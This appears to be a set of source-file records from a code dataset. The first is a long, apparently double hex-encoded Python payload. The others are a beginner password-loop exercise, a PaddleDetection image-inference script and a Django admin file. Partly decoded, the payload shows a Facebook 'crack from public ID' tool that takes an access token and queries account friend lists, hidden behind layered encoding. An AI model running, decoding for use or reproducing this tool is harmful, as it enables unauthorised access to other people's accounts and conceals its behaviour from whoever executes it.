323436333433313335333333353335333533333335343633353431333333303333333033343331333433343333343233343336333433323335333333353336333234363333333533323435333333303333343233343336333433323334343633353330333234363333333133333432333433363334333233343333333433313332343633373338333333383333333633333431333633313337333233363434333633353336333133363332333633393332343433373336333333373336333133333432333534343332333733323339333534343330343133303431333633343336333533363336333233303336333533373338333633393337333433323338333233393333343133303431333033393337333033373332333633393336343533373334333233303332333233353432333233313335343433323330333433353337333833363339333733343332333233303431333033393336343633373333333234353337333333373339333733333332343533363335333733383336333933373334333233383332333933303431333034313330343133363334333633353336333633323330333633313336333333363331333634323332333833363332333233393333343133303431333233303332333033323330333233303337333733323330333334343332333033323337333633313336333833373334333633343337343133363431333633333332333733303431333233303332333033323330333233303336333433323330333334343332333033323337333233373330343133323330333233303332333033323330333633363336343633373332333233303336333933323330333633393336343533323330333733383333343133303431333233303332333033323330333233303332333033323330333233303332333033363334333233303332343233333434333233303332333733323331333233373332343233373337333534323337333233363331333634353336333433363436333634343332343533373332333633313336343533363334333633393336343533373334333233383333333033323433333634333336333533363435333233383337333733323339333234343333333133323339333534343332343233363339333034313332333033323330333233303332333033373332333633353337333433373335333733323336343533323330333633333336
333533373334333633313336343233323338333633343332333933303431333034313330343133363334333633353336333633323330333633333336333533373334333633313336343233323338333633323332333933333431333034313332333033323330333233303332333033373337333233303333343433323330333233373336333133363338333733343336333433373431333634313336333333323337333034313332333033323330333233303332333033363336333634363337333233323330333633393332333033363339333634353332333033373337333334313330343133323330333233303332333033323330333233303332333033323330333233303336343133323330333334343332333033373337333234353336333933363435333633343336333533373338333233383336333933323339333034313332333033323330333233303332333033323330333233303332333033323330333733383333343433323330333733383332343533373332333633353337333033363433333633313336333333363335333233383332333733323331333233353337333333323337333233353336333933323433333233373335343333333330333333333333333333353432333233353337333333333432333333313336343433323337333233353337333333373334333733323332333833333333333333313332343233363431333233393332333933303431333233303332333033323330333233303337333833323330333234323333343433323330333233373335343333333330333333333333333333353432333333303336343433323337333034313332333033323330333233303332333033373338333233303333343433323330333733383332343533373332333633353337333033363433333633313336333333363335333233383332333733323331333333303332333733323433333233373335343333333330333333333333333333353432333333303336343433323337333233393330343133323330333233303332333033323330333733333337333933373333333234353337333333373334333633343336343633373335333733343332343533373337333733323336333933373334333633353332333833373338333234323332333733353433333634353332333733323339333034313330343133303431333633343336333533363336333233303336333833363331333634343337343133363331333233383337343133323339333334313330343133303339333633363336343633373332333233303336333533323330333633393336343533323330333734313332333033323432333233303332333733353433333634353332333733333431333034313330333933303339333733333337333933373333333234353337333333373334333633343336343633373335333733343332343533373337333733323336333933373334333633353332333833363335333233393330343133303339333033393337333333373339333733333332343533373333333733343336333433363436333733353337333433323435333633363336343333373335333733333336333833323338333233393330343133303339333033393337333433363339333634343336333533323435333733333336343333363335333633353337333033323338333333303332343533333330333333333332333933303431333633343336333533363336333233303336333833363436333733303337333333373333333233383337343133323339333334313330343133303339333633363336343633373332333233303336333533323330333633393336343533323330333734313332333033323432333233303332333733353433333634353332333733333431333034313330333933303339333733333337333933373333333234353337333333373334333633343336343633373335333733343332343533373337333733323336333933373334333633353332333833363335333233393330343133303339333033393337333333373339333733333332343533373333333733343336333433363436333733353337333433323435333633363336343333373335333733333336333833323338333233393330343133303339333033393337333433363339333634343336333533323435333733333336343333363335333633353337333033323338333333303332343533333331333233393330343133303431333233333332333333323333333233333332333333323330333434333334343633343337333434363332333033323333333233333332333333323333333233333330343133363332333633313336343533363435333633353337333233323330333334343332333033323332333233323332333233303431343533323339333533393334343533323339333
533393337343533323339333433383330343533323339333533393334343533323339333533393337343533323339333533393334343533323339333533393330343533323339333533393330343533323339333533393330343533323339333533393337343533323339333533393334343533323339333533393330343533323339333533393337343533323339333533393334343533323339333533393330343533323339333533393337343533323339333533393334343533323339333533393330343533323339333533393330343533323339333533393330343533323339333533393330343533323339333533393337343533323339333533393334343533323339333533393330343533323339333533393330343533323339333533393330343533323339333533393337333034313435333233393335333933313435333233393335333933313435333233393334333833303435333233393335333933313435333233393335333933313435333233393335333933313435333233393335333933343435333233393335333933303435333233393335333933373435333233393335333933313435333233393335333933313435333233393335333933313435333233393335333934313435333233393335333934343435333233393335333933313435333233393335333933313435333233393335333934313435333233393335333933303435333233393335333933303435333233393335333933373435333233393335333933303435333233393335333933313435333233393335333933313435333233393335333933343435333233393335333933303435333233393335333933373435333233393335333933313330343134353332333933353339333134353332333933353339343134353332333933353339333034353332333933353339343434353332333933353339333134353332333933353339333134353332333933353339333134353332333933343338333034353332333933353339333134353332333933353339333134353332333933353339333134353332333933353339333434353332333933353339333734353332333933353339333434353332333933353339333734353332333933353339333134353332333933343338333034353332333933343338333034353332333933353339333434353332333933353339343434353332333933353339333434353332333933353339343434353332333933353339333134353332333933353339333134353332333933343338333034353332333933353339333134353332333933353339333133303431343533323339333533393331343533323339333533393334343533323339333533393330343533323339333533393337343533323339333533393331343533323339333533393331343533323339333533393431343533323339333533393330343533323339333533393434343533323339333533393331343533323339333533393331343533323339333533393331343533323339333533393331343533323339333533393331343533323339333533393331343533323339333533393331343533323339333433383330343533323339333533393334343533323339333533393434343533323339333533393334343533323339333533393434343533323339333433383330343533323339333533393331343533323339333533393431343533323339333533393330343533323339333533393434343533323339333533393331333034313435333233393335333933313435333233393335333933313435333233393334333833303435333233393335333933313435333233393335333933313435333233393335333933313435333233393335333933343435333233393335333933303435333233393335333933373435333233393335333933313435333233393335333933313435333233393335333933313435333233393335333933313435333233393335333933313435333233393335333933313435333233393335333933313435333233393335333933343435333233393335333934343435333233393335333933303435333233393335333934313435333233393335333933303435333233393335333933373435333233393335333933313435333233393335333933343435333233393335333933303435333233393335333933373435333233393335333933313330343134353332333933353339343134353332333933353339343434353332333933343338333034353332333933353339343134353332333933353339343434353332333933353339343134353332333933353339343434353332333933343338333034353332333933353339343134353332333933353339343434353332333933353339343134353332333933353339343434353332333933353339343134
353332333933353339343434353332333933353339343134353332333933353339343434353332333933353339343134353332333933353339333034353332333933353339333034353332333933353339333034353332333933353339333034353332333933353339343434353332333933353339343134353332333933353339343434353332333933343338333034353332333933353339343134353332333933353339343433303431333234343332343433323434333234343332343433323434333234343332343433323434333234343332343433323434333234343332343433323434333234343332343433323434333234343332343433323434333234343332343433323434333234343332343433323434333234343332343433323434333234343332343433323434333234343332343433323434333234343332343433323434333234343332343433323434333234343332343433323434333234343332343433303431333034313435333233393435343133333332333033343333333634363336333433363335333733323332333033323330333233303333343133323330333434343337333533363338333633313336343433363434333633313336333433323330333433383336333133363434333734313336333133303431343533323339343534313333333233303334333733363339333733343336333833373335333633323332333033323330333334313332333033363338333733343337333433373330333733333333343133323436333234363336333733363339333733343336333833373335333633323332343533363333333634363336343433323436333433383336333133363434333734313336333133363338333633313337333333363338333034313435333233393435343133333332333033343336333633313336333333363335333633323336343633363436333634323333343133323330333434343337333533363338333633313336343433363434333633313336333433323330333433383336333133363434333734313336333133303431343533323339343534313333333233303335333933363436333733353337333433373335333633323336333533323330333334313332333033343338333434363335333033323330333433313336343533363436333634353337333933363434333634363337333533373333333034313330343133323434333234343332343433323434333234343332343433323434333234343332343433323434333234343332343433323434333234343332343433323434333234343332343433323434333234343332343433323434333234343332343433323434333234343332343433323434333234343332343433323434333234343332343433323434333234343332343433323434333234343332343433323434333234343332343433323434333234343332343433323434333234343332333233323332333233323330343133363332333633313336333333363432333233303333343433323330333333303330343133373334333633383337333233363335333633313336333433373333333233303333343433323330333534323335343433303431333733333337333533363333333633333336333533373333333733333336333633373335333634333332333033333434333233303335343233353434333034313336333333363338333633353336333333363432333733303336343633363339333634353337333433323330333334343332333033353432333534343330343133363436333634323337333333323330333334343332333033353432333534343330343133363337333633313336333733363331333634333332333033333434333233303335343233353434333034313336333933363334333633383332333033333434333233303335343233353434333034313336333933363334333233303333343433323330333534323335343433303431333033393330333933303339333034313332333333343434333633353336343533373335333034313336333433363335333633363332333033363434333633353336343533373335333233383332333933333431333034313332333033323330333233303332333033363436333733333332343533373333333733393337333333373334333633353336343433323338333233373336333333363433333633353336333133373332333233373332333933303431333233303332333033323330333233303337333033373332333633393336343533373334333233303336333233363331333634353336343533363335333733323330343133323330333233303332333033323330333733303337333233363339333634353337333433303431333233303332333033323330333233303337333033373332333633393336343533373
334333233303332333233353432333333313335343433323330333533333337333433363331333733323337333433323330333433333337333233363331333633333336343233363339333634353336333733323332333034313332333033323330333233303332333033373330333733323336333933363435333733343332333033323332333534323333333233353434333233303334333333373332333633313336333333363432333233303334333233373339333233303334343533373335333634343336333233363335333733323332333233303431333233303332333033323330333233303337333033373332333633393336343533373334333233303332333233353432333333333335343433323330333533353337333033363334333633313337333433363335333233323330343133323330333233303332333033323330333733303337333233363339333634353337333433323330333233323335343233333334333534343332333033343336333634363336343333363433333634363337333733323330333434343336333533323330333434363336343533323330333433363336333133363333333633353336333233363436333634363336343233323332333034313332333033323330333233303332333033373330333733323336333933363435333733343332333033303431333233303332333033323330333233303336343433363335333634353337333533353436333633313336333333373334333633393336343633363435333233383332333933303431333633343336333533363336333233303336343433363335333634353337333533353436333633313336333333373334333633393336343633363435333233383332333933333431333034313332333033323330333233303332333033363331333633333337333433323330333334343332333033373332333633313337333733353436333633393336343533373330333733353337333433323338333233373334333333363338333634363336343633373333333633353332333033343436333733303337333433363339333634363336343533323330333334353333343533333435333233303332333733323339333034313332333033323330333233303332333033363339333633363332333033363331333633333337333433323330333334343333343433323332333233323333343133303431333233303332333033323330333233303332333033323330333233303332333033373330333733323336333933363435333733343332333033323332333533373337333233363436333634353336333733323330333433393336343533373330333733353337333433323332333034313332333033323330333233303332333033323330333233303332333033323330333733343336333933363434333633353332343533373333333634333336333533363335333733303332333833333331333233393330343133323330333233303332333033323330333233303332333033323330333233303336343433363335333634353337333533323338333233393330343133323330333233303332333033323330333633353336343333363339333633363332333033363331333633333337333433323330333334343333343433323332333333313332333233333431333034313332333033323330333233303332333033323330333233303332333033323330333633333337333233363331333633333336343233323338333233393330343133323330333233303332333033323330333633353336343333363339333633363332333033363331333633333337333433323330333334343333343433323332333333323332333233333431333034313332333033323330333233303332333033323330333233303332333033323330333634363337333333323435333733333337333933373333333733343336333533363434333233383332333733363333333634333336333533363331333733323332333733323339333034313332333033323330333233303332333033323330333233303332333033323330333634363337333333323435333733333337333933373333333733343336333533363434333233383332333733373330333733393337333433363338333634363336343533333332333233303332343533363435333634363332343533373330333733393332333733323339333034313332333033323330333233303332333033363335333634333336333933363336333233303336333133363333333733343332333033333434333334343332333233333333333233323333343133303431333233303332333033323330333233303332333033323330333233303332333033363436333733333332343533373333333733393337333333373334333633353336343433323338
333233373336333333363433333633353336333133373332333233373332333933303431333233303332333033323330333233303332333033323330333233303332333033373330333733323336333933363435333733343332333033363332333633313336343533363435333633353337333233303431333233303332333033323330333233303332333033323330333233303332333033373330333733323336333933363435333733343330343133323330333233303332333033323330333233303332333033323330333233303336333833363331333634343337343133363331333233383332333733353330333634333336333533363331333733333336333533323330333533373336333133363339333733343332343533323337333233393330343133323330333233303332333033323330333233303332333033323330333233303336343633373333333234353337333333373339333733333337333433363335333634343332333833323337333633373336333933373334333233303337333033373335333634333336343333323330333634363337333233363339333633373336333933363435333233303336343433363331333733333337333433363335333733323332333733323339333034313332333033323330333233303332333033323330333233303332333033323330333633383336333133363434333734313336333133323338333233373335333433363436333634363336343333323330333433383336333133373333333233303335333533373330333633343336333133373334333633353336333433323337333233393330343133323330333233303332333033323330333233303332333033323330333233303337333433363339333634343336333533323435333733333336343333363335333633353337333033323338333333323332333933303431333233303332333033323330333233303332333033323330333233303332333033363436333733333332343533373333333733393337333333373334333633353336343433323338333233373337333033373339333733343336333833363436333634353333333233323330333633383336333333373332333633313336333333363432333234353337333033373339333233373332333933303431333233303332333033323330333233303336333533363433333633393336333633323330333633313336333333373334333233303333343433333434333233323333333433323332333334313330343133323330333233303332333033323330333233303332333033323330333233303336343633373333333234353337333333373339333733333337333433363335333634343332333833323337333733383336333433363337333234343336343633373330333633353336343533323330333733373337333733373337333234353336333633363331333633333336333533363332333634363336343633363432333234353336333333363436333634343332343633363434333733353336333833363331333634343336343433363331333633343332343533363338333633313336343433373431333633313333333133333336333333323333333633323337333233393330343133323330333233303332333033323330333233303332333033323330333233303336343433363335333634353337333533323338333233393330343133363334333633353336333633323330333633333337333233363331333633333336343233323338333233393333343133303431333233303332333033323330333233303336343633373333333234353337333333373339333733333337333433363335333634343332333833323337333633333336343333363335333633313337333233323337333233393330343133323330333233303332333033323330333733303337333233363339333634353337333433323330333633323336333133363435333634353336333533373332333034313332333033323330333233303332333033373330333733323336333933363435333733343330343133323330333233303332333033323330333733303337333233363339333634353337333433323330333233323335343233333331333534343332333033343333333733323336333133363333333634323332333033343336333733323336343633363434333233303334333633373332333633393336333533363435333633343336343333363339333733333337333433323332333034313332333033323330333233303332333033373330333733323336333933363435333733343332333033323332333534323333333233353434333233303334333333373332333633313336333333363432333233303334333633373332333634363336343433323330333533303337333533363332333
634333336333933363333333233303334333933343334333233323330343133323330333233303332333033323330333733303337333233363339333634353337333433323330333233323335343233333333333534343332333033343333333733323336333133363333333634323332333033343336333733323336343633363434333233303334333633363339333634333336333533323332333034313332333033323330333233303332333033373330333733323336333933363435333733343332333033323332333534323333333033353434333233303334333233363331333633333336343233323332333034313332333033323330333233303332333033373330333733323336333933363435333733343330343133323330333233303332333033323330333633333337333233363331333633333336343233353436333634343336333533363435333733353332333833323339333034313332333033323330333233303332333033303431333034313336333433363335333633363332333033363333333733323336333133363333333634323335343633363434333633353336343533373335333233383332333933333431333034313330333933363333333733323336343433323330333334343332333033373332333633313337333733353436333633393336343533373330333733353337333433323338333233323334333333363338333634363336343633373333333633353332333033343436333733303337333433363339333634363336343533323330333334353333343533323330333233303332333233323339333034313330333933363339333633363332333033363333333733323336343433323330333334343333343433323332333233323333343133303431333033393330333933373330333733323336333933363435333733343332333033323332333534323332333133353434333233303334333633363339333634333336343333363335333633343332333033343339333634353336333333363436333733323337333233363335333633333337333433363433333733393332333233303431333033393330333933363333333733323336333133363333333634323335343633363434333633353336343533373335333233383332333933303431333033393336333533363433333633393336333633323330333633333337333233363434333233303333343433333434333233323333333133323332333334313330343133303339333033393336343633373333333234353337333333373339333733333337333433363335333634343332333833323337333633333336343333363335333633313337333233323337333233393330343133303339333033393337333033373332333633393336343533373334333233303336333233363331333634353336343533363335333733323330343133303339333033393337333033373332333633393336343533373334333034313330333933303339333733343336343633363432333633353336343533323330333334343332333033373332333633313337333733353436333633393336343533373330333733353337333433323338333233373335333033363331333733333337333433363335333233303335333433363436333634323336333533363435333233303334333833363335333733323336333533323330333334313332333033323337333233393330343133303339333033393337333433363339333634343336333533323435333733333336343333363335333633353337333033323338333333323332333933303431333033393330333933363436333733333332343533373333333733393337333333373334333633353336343433323338333233373336333333363433333633353336333133373332333233373332333933303431333033393330333933373330333733323336333933363435333733343332333033363332333633313336343533363435333633353337333233303431333033393330333933373330333733323336333933363435333733343330343133303339333033393337333233323330333334343332333033373332333633353337333133373335333633353337333333373334333733333332343533363337333633353337333433323338333233323336333833373334333733343337333033373333333334313332343633323436333633373337333233363331333733303336333833323435333633363336333133363333333633353336333233363436333634363336343233323435333633333336343633363434333234363336343433363335333234363336333633373332333633393336333533363435333633343337333333333436333633313336333333363333333633353337333333373333333534363337333433363436333634
323336333533363435333334343332333233323432333733343336343633363432333633353336343533323339333034313330333933303339333734313332333033333434333233303336343133373333333634363336343533323435333634333336343633363331333633343337333333323338333733323332343533373334333633353337333833373334333233393330343133303339333033393336333633363436333733323332333033373333333233303336333933363435333233303337343133353432333233373336333433363331333733343336333133323337333534343333343133303431333033393330333933303339333633393336333433323435333633313337333033373330333633353336343533363334333233383337333333353432333233373336333933363334333233373335343433323339333034313330333933363335333634333336333933363336333233303336333333373332333634343332333033333434333334343332333233333332333233323333343133303431333033393330333933363436333733333332343533373333333733393337333333373334333633353336343433323338333233373336333333363433333633353336333133373332333233373332333933303431333033393330333933373330333733323336333933363435333733343332333033363332333633313336343533363435333633353337333233303431333033393330333933373330333733323336333933363435333733343330343133303339333033393337333433363436333634323336333533363435333233303333343433323330333733323336333133373337333534363336333933363435333733303337333533373334333233383332333733353330333633313337333333373334333633353332333033353334333634363336343233363335333634353332333033343338333633353337333233363335333233303333343133323330333233373332333933303431333033393330333933373334333633393336343433363335333234353337333333363433333633353336333533373330333233383333333233323339333034313330333933303339333634363337333333323435333733333337333933373333333733343336333533363434333233383332333733363333333634333336333533363331333733323332333733323339333034313330333933303339333733303337333233363339333634353337333433323330333633323336333133363435333634353336333533373332333034313330333933303339333733303337333233363339333634353337333433303431333033393330333933363339333633343337333433323330333334343332333033373332333633313337333733353436333633393336343533373330333733353337333433323338333233323335343233323432333534343332333033343339333634353337333033373335333733343332333033343339333433343333343133323330333233323332333933303431333033393330333933303431333033393330333933373334333733323337333933333431333034313330333933303339333033393336343133363436333634323332333033333434333233303337333233363335333733313337333533363335333733333337333433373333333234353336333733363335333733343332333833323332333633383337333433373334333733303337333333333431333234363332343633363337333733323336333133373330333633383332343533363336333633313336333333363335333633323336343633363436333634323332343533363333333634363336343433323436333233323332343233363339333633343337333433323432333233323333343633363331333633333336333333363335333733333337333333353436333733343336343633363432333633353336343533333434333233323332343233373334333634363336343233363335333634353332333933303431333033393330333933303339333634363337333033323330333334343332333033363431333733333336343633363435333234353336343333363436333633313336333433373333333233383336343133363436333634323332343533373334333633353337333833373334333233393330343133303339333033393330333933363338333633313336343433373431333633313332333833323337333534333333333033333333333333333335343233333331333334323333333933333337333634343335343234353332333934333339333333353434333233303334333133363333333633333336343633373335333634353337333433323330333434353336333133363434333633353332333033353433333333303333333333333333333534323
3333733343337333233323338333634333336333533363435333233383336343633363432333733333332333933323339333234323332333233323436333534333333333033333333333333333335343233333331333334323333333933333337333634343332333233323432333733333337333433373332333233383336343333363335333634353332333833363333333633383336333533363333333634323337333033363436333633393336343533373334333233393332333933323339333034313330333933373330333733323336333933363435333733343332333033323338333333343333333733323431333233323332343433323332333233393330343133303339333034313330333933373332333633313337333733353436333633393336343533373330333733353337333433323338333233323335343333363435333533303337333233363335333733333337333333323330333433353336343533373334333633353337333233323330333533343336343633323330333433323336333133363333333634323332333033323332333233393330343133303339333634343336333533363435333733353332333833323339333033393330343133303339333034313330333933303431333034313336333933363336333233303335343633353436333634353336333133363434333633353335343633353436333233303333343433333434333233303332333733353436333534363336343433363331333633393336343533353436333534363332333733333431333034313330333933363434333633353336343533373335333233383332333933303431333034313330343133303431323732393239272929'))
| 12,622.5 | 100,811 | 0.999445 |
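The blob above is ASCII hex nested several times. A minimal sketch for peeling such layers for inspection without ever executing them — the file name and the layer limit are assumptions, not taken from the row:

import binascii

def peel_hex_layers(blob: str, max_layers: int = 10) -> str:
    """Hex-decode a string repeatedly until it stops looking like hex."""
    for _ in range(max_layers):
        candidate = blob.strip()
        if len(candidate) % 2 != 0:
            break
        try:
            decoded = binascii.unhexlify(candidate).decode("ascii")
        except (binascii.Error, UnicodeDecodeError):
            break  # not a clean hex layer any more; stop peeling
        blob = decoded
    return blob

# print(peel_hex_layers(open("payload.txt").read()))  # inspect only, never exec()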
4a212a6a318511798288c6d8f02512e0c9f097be | 117 | py | Python | Python/Iniciante/1114.py | TiagoSanti/uri-solutions | e80d9e2874cac13e721a96d7aeb075e7d72ceb2d | ["MIT"] | null | null | null | Python/Iniciante/1114.py | TiagoSanti/uri-solutions | e80d9e2874cac13e721a96d7aeb075e7d72ceb2d | ["MIT"] | null | null | null | Python/Iniciante/1114.py | TiagoSanti/uri-solutions | e80d9e2874cac13e721a96d7aeb075e7d72ceb2d | ["MIT"] | null | null | null |
key = int(input())
while key != 2002:
print('Senha Invalida')
key = int(input())
print('Acesso Permitido')
| 14.625 | 27 | 0.615385 |
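A quick way to sanity-check the loop above without the judge is to feed it a fake stdin; the attempt values below are made up, and 2002 is the only accepted key:

import io
import sys

sys.stdin = io.StringIO("2200\n1020\n2002\n")  # hypothetical attempts
key = int(input())
while key != 2002:
    print('Senha Invalida')  # wrong password
    key = int(input())
print('Acesso Permitido')  # access granted
# Expected output: Senha Invalida, Senha Invalida, Acesso Permitido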
4a212ad6b385fbc5e10dd8e04a8934645c3bd689 | 9392 | py | Python | PaddleCV/PaddleDetection/slim/infer.py | Qinyinmm/models | 83d4799028eba4568e7c193ded297d1dfc3279a3 | ["Apache-2.0"] | 1 | 2021-09-08T13:27:19.000Z | 2021-09-08T13:27:19.000Z | PaddleCV/PaddleDetection/slim/infer.py | Qinyinmm/models | 83d4799028eba4568e7c193ded297d1dfc3279a3 | ["Apache-2.0"] | null | null | null | PaddleCV/PaddleDetection/slim/infer.py | Qinyinmm/models | 83d4799028eba4568e7c193ded297d1dfc3279a3 | ["Apache-2.0"] | 1 | 2021-07-29T06:43:01.000Z | 2021-07-29T06:43:01.000Z |
# Copyright (c) 2019 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import sys
import glob
import numpy as np
from PIL import Image
sys.path.append("../../")
def set_paddle_flags(**kwargs):
for key, value in kwargs.items():
if os.environ.get(key, None) is None:
os.environ[key] = str(value)
# NOTE(paddle-dev): All of these flags should be set before
# `import paddle`. Otherwise, it would not take any effect.
set_paddle_flags(
FLAGS_eager_delete_tensor_gb=0, # enable GC to save memory
)
from paddle import fluid
from ppdet.utils.cli import print_total_cfg
from ppdet.core.workspace import load_config, merge_config, create
from ppdet.modeling.model_input import create_feed
from ppdet.data.data_feed import create_reader
from ppdet.utils.eval_utils import parse_fetches
from ppdet.utils.cli import ArgsParser
from ppdet.utils.check import check_gpu
from ppdet.utils.visualizer import visualize_results
import ppdet.utils.checkpoint as checkpoint
import logging
FORMAT = '%(asctime)s-%(levelname)s: %(message)s'
logging.basicConfig(level=logging.INFO, format=FORMAT)
logger = logging.getLogger(__name__)
def get_save_image_name(output_dir, image_path):
"""
Get save image name from source image path.
"""
if not os.path.exists(output_dir):
os.makedirs(output_dir)
image_name = os.path.split(image_path)[-1]
name, ext = os.path.splitext(image_name)
return os.path.join(output_dir, "{}".format(name)) + ext
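# e.g. (hypothetical paths): get_save_image_name("output", "/data/imgs/cat.jpg")
# creates "output/" if it is missing and returns "output/cat.jpg".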
def get_test_images(infer_dir, infer_img):
"""
Get image path list in TEST mode
"""
assert infer_img is not None or infer_dir is not None, \
"--infer_img or --infer_dir should be set"
assert infer_img is None or os.path.isfile(infer_img), \
"{} is not a file".format(infer_img)
assert infer_dir is None or os.path.isdir(infer_dir), \
"{} is not a directory".format(infer_dir)
images = []
# infer_img has a higher priority
if infer_img and os.path.isfile(infer_img):
images.append(infer_img)
return images
infer_dir = os.path.abspath(infer_dir)
assert os.path.isdir(infer_dir), \
"infer_dir {} is not a directory".format(infer_dir)
exts = ['jpg', 'jpeg', 'png', 'bmp']
exts += [ext.upper() for ext in exts]
for ext in exts:
images.extend(glob.glob('{}/*.{}'.format(infer_dir, ext)))
assert len(images) > 0, "no image found in {}".format(infer_dir)
logger.info("Found {} inference images in total.".format(len(images)))
return images
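# e.g. (hypothetical layout): with --infer_img=demo.jpg the function returns
# ["demo.jpg"] even if --infer_dir is also set; with only --infer_dir=imgs/ it
# collects every *.jpg/*.jpeg/*.png/*.bmp file (either case) under imgs/.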
def main():
cfg = load_config(FLAGS.config)
if 'architecture' in cfg:
main_arch = cfg.architecture
else:
raise ValueError("'architecture' not specified in config file.")
merge_config(FLAGS.opt)
# check if set use_gpu=True in paddlepaddle cpu version
check_gpu(cfg.use_gpu)
# print_total_cfg(cfg)
if 'test_feed' not in cfg:
test_feed = create(main_arch + 'TestFeed')
else:
test_feed = create(cfg.test_feed)
test_images = get_test_images(FLAGS.infer_dir, FLAGS.infer_img)
test_feed.dataset.add_images(test_images)
place = fluid.CUDAPlace(0) if cfg.use_gpu else fluid.CPUPlace()
exe = fluid.Executor(place)
infer_prog, feed_var_names, fetch_list = fluid.io.load_inference_model(
dirname=FLAGS.model_path, model_filename=FLAGS.model_name,
params_filename=FLAGS.params_name,
executor=exe)
reader = create_reader(test_feed)
feeder = fluid.DataFeeder(place=place, feed_list=feed_var_names,
program=infer_prog)
# parse infer fetches
assert cfg.metric in ['COCO', 'VOC'], \
"unknown metric type {}".format(cfg.metric)
extra_keys = []
if cfg['metric'] == 'COCO':
extra_keys = ['im_info', 'im_id', 'im_shape']
if cfg['metric'] == 'VOC':
extra_keys = ['im_id', 'im_shape']
    keys, values, _ = parse_fetches({'bbox': fetch_list}, infer_prog, extra_keys)
# parse dataset category
if cfg.metric == 'COCO':
from ppdet.utils.coco_eval import bbox2out, mask2out, get_category_info
if cfg.metric == "VOC":
from ppdet.utils.voc_eval import bbox2out, get_category_info
anno_file = getattr(test_feed.dataset, 'annotation', None)
with_background = getattr(test_feed, 'with_background', True)
use_default_label = getattr(test_feed, 'use_default_label', False)
clsid2catid, catid2name = get_category_info(anno_file, with_background,
use_default_label)
# whether output bbox is normalized in model output layer
is_bbox_normalized = False
# use tb-paddle to log image
if FLAGS.use_tb:
from tb_paddle import SummaryWriter
tb_writer = SummaryWriter(FLAGS.tb_log_dir)
tb_image_step = 0
tb_image_frame = 0 # each frame can display ten pictures at most.
imid2path = reader.imid2path
    # Only the bbox output is fetched from the frozen program, so narrow the
    # keys parsed above down to 'bbox'.
    keys = ['bbox']
for iter_id, data in enumerate(reader()):
feed_data = [[d[0], d[1]] for d in data]
outs = exe.run(infer_prog,
feed=feeder.feed(feed_data),
fetch_list=fetch_list,
return_numpy=False)
res = {
k: (np.array(v), v.recursive_sequence_lengths())
for k, v in zip(keys, outs)
}
res['im_id'] = [[d[2] for d in data]]
logger.info('Infer iter {}'.format(iter_id))
bbox_results = None
mask_results = None
if 'bbox' in res:
bbox_results = bbox2out([res], clsid2catid, is_bbox_normalized)
        if 'mask' in res:
            # BUG FIX: the original line read `model.mask_head.resolution`, but
            # no `model` object exists in this script (the network is restored
            # via load_inference_model). Reading the resolution from the config
            # is an assumption about its layout.
            mask_resolution = cfg['MaskHead']['resolution']
            mask_results = mask2out([res], clsid2catid, mask_resolution)
# visualize result
im_ids = res['im_id'][0]
for im_id in im_ids:
image_path = imid2path[int(im_id)]
image = Image.open(image_path).convert('RGB')
# use tb-paddle to log original image
if FLAGS.use_tb:
original_image_np = np.array(image)
tb_writer.add_image(
"original/frame_{}".format(tb_image_frame),
original_image_np,
tb_image_step,
dataformats='HWC')
image = visualize_results(image,
int(im_id), catid2name,
FLAGS.draw_threshold, bbox_results,
mask_results)
# use tb-paddle to log image with bbox
if FLAGS.use_tb:
infer_image_np = np.array(image)
tb_writer.add_image(
"bbox/frame_{}".format(tb_image_frame),
infer_image_np,
tb_image_step,
dataformats='HWC')
tb_image_step += 1
if tb_image_step % 10 == 0:
tb_image_step = 0
tb_image_frame += 1
save_name = get_save_image_name(FLAGS.output_dir, image_path)
logger.info("Detection bbox results save in {}".format(save_name))
image.save(save_name, quality=95)
if __name__ == '__main__':
parser = ArgsParser()
parser.add_argument(
"--infer_dir",
type=str,
default=None,
help="Directory for images to perform inference on.")
parser.add_argument(
"--infer_img",
type=str,
default=None,
help="Image path, has higher priority over --infer_dir")
parser.add_argument(
"--output_dir",
type=str,
default="output",
help="Directory for storing the output visualization files.")
parser.add_argument(
"--draw_threshold",
type=float,
default=0.5,
help="Threshold to reserve the result for visualization.")
parser.add_argument(
"--use_tb",
type=bool,
default=False,
help="whether to record the data to Tensorboard.")
parser.add_argument(
'--tb_log_dir',
type=str,
default="tb_log_dir/image",
help='Tensorboard logging directory for image.')
parser.add_argument(
'--model_path',
type=str,
default=None,
help="inference model path")
parser.add_argument(
'--model_name',
type=str,
default='__model__.infer',
help="model filename for inference model")
parser.add_argument(
'--params_name',
type=str,
default='__params__',
help="params filename for inference model")
FLAGS = parser.parse_args()
main()
| 33.906137 | 80 | 0.627449 |
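The script above assumes a frozen program saved by PaddleDetection's export step. A minimal sketch of the load/run contract it builds on (Paddle 1.x `fluid` API — the directory name and input shape are assumptions):

import numpy as np
from paddle import fluid

place = fluid.CPUPlace()
exe = fluid.Executor(place)
# Mirrors the load_inference_model call in main(); "freeze_dir" is made up.
prog, feed_names, fetch_list = fluid.io.load_inference_model(
    dirname="freeze_dir",
    model_filename="__model__.infer",
    params_filename="__params__",
    executor=exe)
# Detection programs usually expect more than the raw image (im_info,
# im_shape, ...); a single dummy tensor is used here only to show the call.
dummy = np.zeros((1, 3, 608, 608), dtype=np.float32)
outs = exe.run(prog,
               feed={feed_names[0]: dummy},
               fetch_list=fetch_list,
               return_numpy=False)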
4a212af2372d76702b01259a5bc996b4cdcfd600 | 234 | py | Python | gateway/admin.py | RockefellerArchiveCenter/ProjectElectronAPIGateway | 4a35c24fe5c09df4f849d1f74b45af5a49c61ac6 | ["MIT"] | null | null | null | gateway/admin.py | RockefellerArchiveCenter/ProjectElectronAPIGateway | 4a35c24fe5c09df4f849d1f74b45af5a49c61ac6 | ["MIT"] | null | null | null | gateway/admin.py | RockefellerArchiveCenter/ProjectElectronAPIGateway | 4a35c24fe5c09df4f849d1f74b45af5a49c61ac6 | ["MIT"] | null | null | null |
from django.contrib import admin
from .models import Application, RequestLog, ServiceRegistry, Source
admin.site.register(Application)
admin.site.register(ServiceRegistry)
admin.site.register(Source)
admin.site.register(RequestLog)
| 26 | 68 | 0.837607 |
